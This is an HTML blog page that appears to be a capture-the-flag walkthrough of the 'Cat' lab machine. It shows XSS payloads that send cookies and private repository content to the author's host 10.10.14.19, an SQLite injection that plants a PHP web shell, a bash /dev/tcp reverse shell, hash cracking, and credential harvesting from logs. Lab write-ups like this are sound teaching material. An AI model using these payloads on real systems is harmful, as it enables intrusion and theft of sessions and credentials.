<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="Nmap123456789101112131415161718192021222324nmap 10.10.11.53 -sC -sVStarting Nmap 7.97 ( https:&#x2F;&#x2F;nmap.org ) at 2025-07-29 17:45 -0400Nmap scan report for cat.htb (10.10.11.53)Host is up (0.068s latency">
<meta property="og:type" content="article">
<meta property="og:title" content="Cat">
<meta property="og:url" content="http://example.com/2025/07/30/Cat/index.html">
<meta property="og:site_name" content="valiumaggelein">
<meta property="og:description" content="Nmap123456789101112131415161718192021222324nmap 10.10.11.53 -sC -sVStarting Nmap 7.97 ( https:&#x2F;&#x2F;nmap.org ) at 2025-07-29 17:45 -0400Nmap scan report for cat.htb (10.10.11.53)Host is up (0.068s latency">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/images/cat/image.png">
<meta property="og:image" content="http://example.com/images/cat/image-1.png">
<meta property="og:image" content="http://example.com/images/cat/image-2.png">
<meta property="og:image" content="http://example.com/images/cat/image-3.png">
<meta property="og:image" content="http://example.com/images/cat/image-4.png">
<meta property="og:image" content="http://example.com/images/cat/image-5.png">
<meta property="og:image" content="http://example.com/images/cat/image-6.png">
<meta property="og:image" content="http://example.com/images/cat/image-7.png">
<meta property="og:image" content="http://example.com/images/cat/image-8.png">
<meta property="og:image" content="http://example.com/images/cat/image-9.png">
<meta property="og:image" content="http://example.com/images/cat/image-10.png">
<meta property="og:image" content="http://example.com/images/cat/image-11.png">
<meta property="og:image" content="http://example.com/images/cat/image-12.png">
<meta property="og:image" content="http://example.com/images/cat/image-13.png">
<meta property="og:image" content="http://example.com/images/cat/image-14.png">
<meta property="og:image" content="http://example.com/images/cat/image-15.png">
<meta property="og:image" content="http://example.com/images/cat/image-16.png">
<meta property="og:image" content="http://example.com/images/cat/image-17.png">
<meta property="og:image" content="http://example.com/images/cat/image-18.png">
<meta property="og:image" content="http://example.com/images/cat/image-19.png">
<meta property="og:image" content="http://example.com/images/cat/image-20.png">
<meta property="og:image" content="http://example.com/images/cat/image-21.png">
<meta property="article:published_time" content="2025-07-31T00:55:44.000Z">
<meta property="article:modified_time" content="2025-07-30T23:45:25.092Z">
<meta property="article:author" content="valiumaggelein">
<meta property="article:tag" content="Web">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/images/cat/image.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>Cat</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
    <!-- mathjax -->
    
<meta name="generator" content="Hexo 7.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/archives/">Archive</a></li><!--
     --><!--
       --><li><a href="/categories/">Categories</a></li><!--
     --><!--
       --><li><a href="/tags/">Tags</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="/2025/09/09/Pearl-ImaginaryCTF-2025/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post" href="/2025/07/27/Game-Tester/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2025/07/30/Cat/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2025/07/30/Cat/&text=Cat"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2025/07/30/Cat/&title=Cat"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2025/07/30/Cat/&is_video=false&description=Cat"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Cat&body=Check out this article: http://example.com/2025/07/30/Cat/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2025/07/30/Cat/&title=Cat"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2025/07/30/Cat/&title=Cat"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2025/07/30/Cat/&title=Cat"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2025/07/30/Cat/&title=Cat"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2025/07/30/Cat/&name=Cat&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2025/07/30/Cat/&t=Cat"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Nmap"><span class="toc-number">1.</span> <span class="toc-text">Nmap</span></a></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        Cat
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">valiumaggelein</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2025-07-31T00:55:44.000Z" class="dt-published" itemprop="datePublished">2025-07-30</time>
        
      
    </div>


      

      
    <div class="article-tag">
        <i class="fa-solid fa-tag"></i>
        <a class="p-category" href="/tags/Web/" rel="tag">Web</a>
    </div>


    </div>
  </header>
  
  <!-- Display the description -->
  

  

  <div class="content e-content" itemprop="articleBody">
    <h1 id="Nmap"><a href="#Nmap" class="headerlink" title="Nmap"></a>Nmap</h1><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">nmap 10.10.11.53 -sC -sV</span><br><span class="line">Starting Nmap 7.97 ( https://nmap.org ) at 2025-07-29 17:45 -0400</span><br><span class="line">Nmap scan report <span class="keyword">for</span> cat.htb (10.10.11.53)</span><br><span class="line">Host is up (0.068s latency).</span><br><span class="line">Not shown: 998 closed tcp ports (conn-refused)</span><br><span class="line">PORT   STATE SERVICE VERSION</span><br><span class="line">22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)</span><br><span class="line">| ssh-hostkey:</span><br><span class="line">|   3072 96:2d:f5:c6:f6:9f:59:60:e5:65:85:ab:49:e4:76:14 (RSA)</span><br><span class="line">|   256 9e:c4:a4:40:e9:da:cc:62:d1:d6:5a:2f:9e:7b:d4:aa (ECDSA)</span><br><span class="line">|_  256 6e:22:2a:6a:6d:eb:de:19:b7:16:97:c2:7e:89:29:d5 (ED25519)</span><br><span class="line">80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))</span><br><span class="line">| http-git:</span><br><span class="line">|   10.10.11.53:80/.git/</span><br><span class="line">|     Git repository found!</span><br><span class="line">|     Repository description: Unnamed repository; edit this file <span class="string">&#x27;description&#x27;</span> to name the...</span><br><span class="line">|_    Last commit message: Cat v1</span><br><span class="line">|_http-server-header: Apache/2.4.41 (Ubuntu)</span><br><span class="line">| http-cookie-flags:</span><br><span class="line">|   /:</span><br><span class="line">|     PHPSESSID:</span><br><span class="line">|_      httponly flag not <span class="built_in">set</span></span><br><span class="line">|_http-title: Best Cat Competition</span><br><span class="line">Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel</span><br></pre></td></tr></table></figure>

<p>Before I do anything, I am going to add <code>10.10.11.53 cat.htb</code> to my <code>/etc/hosts</code> file. I had ran an nmap scan before the one above and it was redirecting me to <code>http://cat.htb/</code>.</p>
<p>Upon running an nmap scan, we see ports 22 (ssh) and 80 (web server) open. Since we ran it with the default script flag <code>-sC</code>, it gives us some extra information. As you can see, there is an exposed git repository in <code>/.git</code> on the website.</p>
<p>At this point, I had already fuzzed subdomains &amp; performed directory bruteforcing using feroxbuster. I hadn’t found any new endpoints that weren’t already in the exposed git repository except for the <code>/uploads</code> endpoint. I attempted to access the <code>/uploads</code> endpoint but I got a <code>403 Unauthorized</code> error.</p>
<br>

<p><img src="/../images/cat/image.png" alt="alt text"><br>Upon visiting the website, I clicked around all the pages to see if I found anything interesting. The home page didn’t really have anything, neither did the <strong>Vote</strong> or <strong>Winners</strong> page; both those pages had buttons but they didn’t actually do anything. When trying to visit <strong>Contest</strong> it just redirects me to the <code>/join.php</code> endpoint.</p>
<p>I decided to go to the <strong>Join</strong> page and register an account. After registering the account I log in.</p>
<p>I initially assumed that the website would use <code>PHPSESSID</code> for the cookie since the website’s tech stack includes php, and I was correct. When logging in, I like to check the cookie’s <code>HttpOnly</code> value. The reason I do this is because if the <code>HttpOnly</code> value isn’t set, that means that the cookie is possibly able to be stolen via XSS. It’s a protection put in place so that when it is set, client-side JS isn’t allowed to interact with the cookie.</p>
<p><img src="/../images/cat/image-1.png" alt="alt text"></p>
<br>

<p>After finding this, I decide to take a closer look at the source code and found a string containing blocked characters in the submission forms of the <code>contest.php</code> endpoint.</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (<span class="variable">$_SERVER</span>[<span class="string">&quot;REQUEST_METHOD&quot;</span>] == <span class="string">&quot;POST&quot;</span>) &#123;</span><br><span class="line">    <span class="comment">// Capture form data</span></span><br><span class="line">    <span class="variable">$cat_name</span> = <span class="variable">$_POST</span>[<span class="string">&#x27;cat_name&#x27;</span>];</span><br><span class="line">    <span class="variable">$age</span> = <span class="variable">$_POST</span>[<span class="string">&#x27;age&#x27;</span>];</span><br><span class="line">    <span class="variable">$birthdate</span> = <span class="variable">$_POST</span>[<span class="string">&#x27;birthdate&#x27;</span>];</span><br><span class="line">    <span class="variable">$weight</span> = <span class="variable">$_POST</span>[<span class="string">&#x27;weight&#x27;</span>];</span><br><span class="line"></span><br><span class="line">    <span class="variable">$forbidden_patterns</span> = <span class="string">&quot;/[+*&#123;&#125;&#x27;,;&lt;&gt;()\\[\\]\\/\\:]/&quot;</span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Check for forbidden content</span></span><br><span class="line">    <span class="keyword">if</span> (<span class="title function_ invoke__">contains_forbidden_content</span>(<span class="variable">$cat_name</span>, <span class="variable">$forbidden_patterns</span>) ||</span><br><span class="line">        <span class="title function_ invoke__">contains_forbidden_content</span>(<span class="variable">$age</span>, <span class="variable">$forbidden_patterns</span>) ||</span><br><span class="line">        <span class="title function_ invoke__">contains_forbidden_content</span>(<span class="variable">$birthdate</span>, <span class="variable">$forbidden_patterns</span>) ||</span><br><span class="line">        <span class="title function_ invoke__">contains_forbidden_content</span>(<span class="variable">$weight</span>, <span class="variable">$forbidden_patterns</span>)) &#123;</span><br><span class="line">        <span class="variable">$error_message</span> = <span class="string">&quot;Your entry contains invalid characters.&quot;</span>;</span><br></pre></td></tr></table></figure>

<br>

<p>I performed a recursive grep (<code>grep -Ri</code>) to see if <code>$forbidden_patterns</code> showed up anywhere else in the source code, and I found out it didn’t.<br><img src="/../images/cat/image-2.png" alt="alt text"></p>
<p>Given this, I assumed that ths <code>contest.php</code> endpoint is the only one that had character restrictions on the submission forms. Knowing this, I tried registering on the website again but with an XSS payload as the username this time.</p>
<p>I went to the <code>register.php</code> endpoint and registered with a payload I could use to potentially steal an admin cookie:</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;<span class="title function_">fetch</span>(<span class="string">&#x27;http://10.10.14.19:8000/steal?c=&#x27;</span>+<span class="built_in">encodeURIComponent</span>(<span class="variable language_">document</span>.<span class="property">cookie</span>));&lt;/script&gt;</span><br></pre></td></tr></table></figure>
<p><img src="/../images/cat/image-3.png"><br>I got a registration successful message.</p>
<br>

<p>Throughout this process, I’ve had a listener on port 8000 this whole time to check for any callbacks from the server, but nothing so far. I couldn’t think of any way to “source” this XSS payload to get a callback. I was out of options at this point and decided to throw the kitchen sink at this.</p>
<p>I went to the <code>contest.php</code> endpoint and submitted the form to see if it would source the XSS payload in the backend, and that’s when I finally got a callback with the admin’s <code>PHPSESSID</code>.</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">python -m http.server</span><br><span class="line">Serving HTTP on :: port 8000 (http://[::]:8000/) ...</span><br><span class="line">::ffff:10.10.11.53 - - [29/Jul/2025 18:56:08] code 404, message File not found</span><br><span class="line">::ffff:10.10.11.53 - - [29/Jul/2025 18:56:08] <span class="string">&quot;GET /steal?c=PHPSESSID%3Dc8org42nna123klv969sauvtfu HTTP/1.1&quot;</span> 404 -</span><br></pre></td></tr></table></figure>
<br>

<p>After going in my browser’s storage and replacing my <code>PHPSESSID</code> with the one I got from the admin, I get access to the <code>admin.php</code> page on the website.<br><img src="/../images/cat/image-4.png" alt="alt text"></p>
<br>

<p>After obtaining this page &amp; messing around with some of the features and intercepting requests in Burpsuite, I didn’t really find much. I resorted to going back to the source code &amp; running the Snyk vulnerability scanner on it, and I found something important.<br><img src="/../images/cat/image-5.png" alt="alt text"></p>
<br>

<p>Having figured there is a SQL injection vulnerability in the <code>/accept_cat.php</code> endpoint, I employed the use of SQLmap to see if it’s able to find the vulnerable parameter &amp; perform the SQL injection.</p>
<p>After attempting to use SQLmap multiple times, I wasn’t able to get it to properly &amp; efficiently dump the databases, but it was able to tell me it was the <code>catName</code> parameter in the <code>POST</code> request that was vulnerable. Knowing this, I decided to go onto the PayloadsAllTheThings Github repository which contains a plethora of payloads for all sorts of attacks, and tried using the SQLite Remote Code Execution payload manually.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">ATTACH DATABASE &#x27;/var/www/cat.htb/lol.php&#x27; AS lol;</span><br><span class="line">CREATE TABLE lol.pwn (dataz text);</span><br><span class="line">INSERT INTO lol.pwn (dataz) VALUES (&quot;&lt;?php system($_GET[&#x27;cmd&#x27;]); ?&gt;&quot;);--</span><br></pre></td></tr></table></figure>
<br>

<p>After messing around with this payload and finally getting it to successfuly run, I was able to get a webshell when going to <code>/lol.php</code>. I tested it by running <code>whoami</code>, and we can see the web server is running as <code>www-data</code>.<br><img src="/../images/cat/image-6.png" alt="alt text"></p>
<p>Now that we have RCE, we can finally get a reverse shell on the target. The payload I used was <code>bash -c &#39;sh -i &gt;&amp; /dev/tcp/10.10.14.19/4444 0&gt;&amp;1&#39;</code> &amp; then I URL encoded it in the request.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">GET /lol.php?cmd=bash+-c+&#x27;sh+-i+&gt;%26+/dev/tcp/10.10.14.19/4444+0&gt;%261&#x27; HTTP/1.1</span><br><span class="line">Host: cat.htb</span><br><span class="line">Accept-Language: en-US,en;q=0.9</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br><span class="line">User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36</span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7</span><br><span class="line">Accept-Encoding: gzip, deflate, br</span><br><span class="line">Cookie: PHPSESSID=dngmf2s39cuju5ggg0hu47h4c2</span><br><span class="line">Connection: keep-alive</span><br><span class="line">Content-Length: 0</span><br></pre></td></tr></table></figure>

<br>

<p>After catching the reverse shell, I simply upgraded the TTY to make my life easier.<br><img src="/../images/cat/image-7.png" alt="alt text"></p>
<br>

<p>Recalling from when I was analyzing the source code, I had remembered seeing a database file in the <code>config.php</code> file.</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="comment">// Database configuration</span></span><br><span class="line"><span class="variable">$db_file</span> = <span class="string">&#x27;/databases/cat.db&#x27;</span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">// Connect to the database</span></span><br><span class="line"><span class="keyword">try</span> &#123;</span><br><span class="line">    <span class="variable">$pdo</span> = <span class="keyword">new</span> <span class="title function_ invoke__">PDO</span>(<span class="string">&quot;sqlite:<span class="subst">$db_file</span>&quot;</span>);</span><br><span class="line">    <span class="variable">$pdo</span>-&gt;<span class="title function_ invoke__">setAttribute</span>(PDO::<span class="variable constant_">ATTR_ERRMODE</span>, PDO::<span class="variable constant_">ERRMODE_EXCEPTION</span>);</span><br><span class="line">&#125; <span class="keyword">catch</span> (PDOException <span class="variable">$e</span>) &#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">&quot;Error: &quot;</span> . <span class="variable">$e</span>-&gt;<span class="title function_ invoke__">getMessage</span>());</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<br>

<p>Since this file also tells me that the DMBS is sqlite, I simply ran <code>sqlite3 /databases/cat.db</code> and was met with the database command prompt without requiring any authentication, which is a major security flaw. I did some basic enumeration of tables &amp; schema in the database, and was able to find a plethora of usernames and MD5 hashes.</p>
<p><img src="/../images/cat/image-8.png" alt="alt text"></p>
<br>

<p>I took all the password hashes and put them into crackstation, and got a hit.<br><img src="/../images/cat/image-9.png" alt="alt text"></p>
<br>

<p>I performed <code>grep</code> on that exact password hash on the file I saved the credentials to, and I saw that the password belongs to the rosa user. Upon looking at <code>/etc/passwd</code>, I saw that rosa was a user that could have a shell on the box, so I ran <code>su rosa</code>, inputted the password, and was able to successfully log in as rosa.<br><img src="/../images/cat/image-10.png" alt="alt text"></p>
<br>

<p>I decided, to get an even more stable shell, I’d ssh to the box with rosa’s credentials. After logging in, the first step I usually like to take when on the box is to run linpeas, and then sift through all the information I find &amp; see if I find anything useful.</p>
<p>Upon running linpeas, I saw that rosa was part of a group called <code>adm</code>, and saw that I am able to read all of the apache log files because rosa is a part of this group, so I decided to grep for “password” on all of the log files and see if I find any credentials in log files.<br><img src="/../images/cat/image-11.png" alt="alt text"></p>
<br>

<p>After doing this, I see hundreds of <code>GET</code> requests from localhost in the <code>/var/log/apache2/access.log</code> to <code>join.php</code>, with some interesting information.<br><img src="/../images/cat/image-12.png" alt="alt text"><br><br></p>
<p>It seems I’ve finally found credentials to the <code>axel</code> user, which is also an enabled user on the box, so I decide to try and log in with these credentials I found on the box.</p>
<p><img src="/../images/cat/image-13.png"></p>
<p>Upon successful log in, I go to axel’s home directory, and there I find the user flag. Onto privilege escalation now.</p>
<br>

<p>Once logged into the axel user, I decide to do my usual manual privilege escalation checks where I run <code>sudo -l</code>, check for any unusual directories I can traverse, running processes, active connections, etc. Upon listing the active connections using <code>netstat -planet</code>, I see a plethora of listening ports, but one in particular piques my interest; port 3000 on localhost.<br><img src="/../images/cat/image-14.png" alt="alt text"><br><br><br><br></p>
<p>I run <code>curl</code> on <code>localhost:3000</code>, and I see that it says “Gitea”, which I know is a Git service that you can self-host. I’m assuming there’s going to be a repository with some source code I can look at that might contain more useful information. I ssh to the box again, port forwarding localhost port 3000 so I can access it on my web browser using <code>ssh -L 3000:localhost:3000 axel@10.10.11.53</code>.<br><img src="/../images/cat/image-15.png" alt="alt text"></p>
<br>

<p>After gaining access to the website, I log in with the axel user and then the rosa user, but I do not find any source code whatsoever anywhere, so I go back to the ssh on the box as axel and run linpeas to see if I can find anything that could help me.</p>
<p>After running linpeas and going down numerous rabbit holes, I stumbled upon an e-mail in <code>/var/mail/axel</code> that had some extra information: an endpoint containing a repository that can only be accessed by an admin.<br><img src="/../images/cat/image-16.png" alt="alt text"></p>
<br>

<p>After finding this, I didn’t know how else to progress, and after a while of being stuck, it occurred to me to look at the version of Gitea that’s being hosted: version <code>1.22.0</code>. I decided to search up any exploits that might be available for this version of Gitea, and I found one that seemed promising.<br><img src="/../images/cat/image-17.png" alt="alt text"></p>
<br>

<p>After finding that the exploit involves stored XSS, I checked the cookie on the website and it was unfortunately set to <code>HttpOnly</code>, so we wouldn’t be able to steal the cookie via this exploit. However, we don’t need to steal the admin cookie. We can just perform requests on the admin’s behalf, which would allow us to view the repository we don’t have access to.<br><img src="/../images/cat/image-18.png" alt="alt text"></p>
<br>

<p>The exploit involves creating a new repository and inputting the XSS payload in the <code>Description</code> field of the repository. I tested a simple <code>alert()</code> payload in the description field and it worked. I employed ChatGPT to write a simple Javascript one-liner that would fetch the information from the <code>/administrator/Employee-Management</code> endpoint, and <code>POST</code> it back to a Python webserver I’d be running. In order for the box’s automated user to “source” this XSS however, I need to create a file in the repository and send the repository to jobert in an e-mail. In the e-mail it stated: “Please send an email to jobert@localhost with information about your Gitea repository. Jobert will check if it is a promising service that we can develop.”</p>
<br>

<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">a</span> <span class="attr">href</span>=</span></span><br><span class="line"><span class="tag"><span class="string">&quot;javascript:var req = new XMLHttpRequest();req.open(&#x27;GET&#x27;, &#x27;http://localhost:3000/administrator/Employee-management/raw/branch/main/readme.md&#x27;, false);req.send();var response = req.responseText;var req2 = new XMLHttpRequest();req2.open(&#x27;GET&#x27; , &#x27;http://10.10.14.19:8000/?content=&#x27; + btoa(response),true);req2.send();&quot;</span>&gt;</span>XSS Test<span class="tag">&lt;/<span class="name">a</span>&gt;</span></span><br></pre></td></tr></table></figure>
<br>

<p>I had ChatGPT generate the above payload, and I used the directory structure of the repositories on Gitea and tried reading the contents of <code>README.md</code>. In order to source the XSS however, I need to send an e-mail with the repository containing the XSS payload to <code>jobert@localhost</code>, so I ran <code>echo &quot;http://localhost:3000/axel/foobar | sendmail jobert@localhost</code> on the box, and I got the callback from the page with the below content:<br><img src="/../images/cat/image-19.png" alt="alt text"><br><br><br><br></p>
<p>This most likely means that the <code>README.md</code> doesn’t exist, so I tried running the same payload, but this time I tried getting the contents of <code>index.php</code> instead, and I got this:<br><img src="/../images/cat/image-20.png" alt="alt text"><br><br></p>
<p>This contained the credentials for the admin user. I tried the credentials on the Gitea page, but they didn’t work, so I then tried the credentials on root on the box, and I successfully logged in as root and got the flag.<br><img src="/../images/cat/image-21.png" alt="alt text"></p>

  </div>
</article>




        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">Home</a></li>
        
          <li><a href="/archives/">Archive</a></li>
        
          <li><a href="/categories/">Categories</a></li>
        
          <li><a href="/tags/">Tags</a></li>
        
          <li><a href="/search/">Search</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Nmap"><span class="toc-number">1.</span> <span class="toc-text">Nmap</span></a></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2025/07/30/Cat/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2025/07/30/Cat/&text=Cat"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2025/07/30/Cat/&title=Cat"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2025/07/30/Cat/&is_video=false&description=Cat"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Cat&body=Check out this article: http://example.com/2025/07/30/Cat/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2025/07/30/Cat/&title=Cat"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2025/07/30/Cat/&title=Cat"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2025/07/30/Cat/&title=Cat"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2025/07/30/Cat/&title=Cat"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2025/07/30/Cat/&name=Cat&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2025/07/30/Cat/&t=Cat"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
